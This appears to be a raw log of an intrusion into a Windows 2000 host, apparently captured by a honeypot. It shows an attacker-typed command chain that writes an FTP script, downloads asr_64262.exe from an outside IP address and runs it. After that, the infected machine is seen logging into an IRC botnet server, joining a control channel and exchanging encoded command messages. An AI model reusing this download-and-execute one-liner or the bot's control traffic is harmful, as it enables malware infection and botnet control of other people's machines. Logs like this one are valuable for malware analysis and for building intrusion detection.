VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> ATTACKER: echo open 216.66.138.99 35715 >> asr_qwtsh &echo user qwtshf qwtshf >> asr_qwtsh &echo get asr_64262.exe >> asr_qwtsh &echo quit >> asr_qwtsh &ftp -nv -s:asr_qwtsh &start asr_64262.exe ATTACKER: 220 VICTIM: USER qwtshf ATTACKER: 331 VICTIM: PASS qwtshf ATTACKER: 230 VICTIM: PORT 192,168,1,207,4 ATTACKER: 200 ATTACKER: RETR asr_64262.exe ATTACKER: 150 ATTACKER: 226 VICTIM: QUIT ATTACKER: 221 VICTIM: PASS secretpass VICTIM: NICK P|m5v6cb873USER w4dxvc85e * 0 :USA|2K|050 ATTACKER: :hub.40795.net 001 P|m5v6cb873 :P|m5v6cb873!w4dxvc85e@192.168.1.207:hub.40795.net 1 P|m5v6cb873 :Login: :hub.40795.net 376 P|m5v6cb873 : VICTIM: USERHOST P|m5v6cb873 VICTIM: USERHOST P|m5v6cb873MODE P|m5v6cb873 JOIN #mm RSA ATTACKER: :hub.40795.net 302 P|m5v6cb873 :P|m5v6cb873=+w4dxvc85e@192.168.1.207 ATTACKER: :hub.40795.net 302 P|m5v6cb873 :P|m5v6cb873=+w4dxvc85e@192.168.1.207 :hub.40795.net 221 P|m5v6cb873 +:P|m5v6cb873!w4dxvc85e@192.168.1.207 JOIN :#mm:hub.40795.net 332 P|m5v6cb873 #mm :+mRPT00QScbE.IQhIO0/do540d2vZX/C8d1J0KQwLp0QRx.H16LAK1.yljhJ/pmijm1/.aaY.3NdxZ/rkMx40 VICTIM: PRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S/EdYX/xXUDj093Z0X0JV7.c0kobHn.HwIa/.lp7rj/X7JlN.YHwTF/PxQdA067AvB/I3dvk159vvk/p1d3/tEsA/0b7FNk0cuplp14Otlj1MT7lW/KzwsA.RKUWp.jZL2z0EkS7/.wqp6e1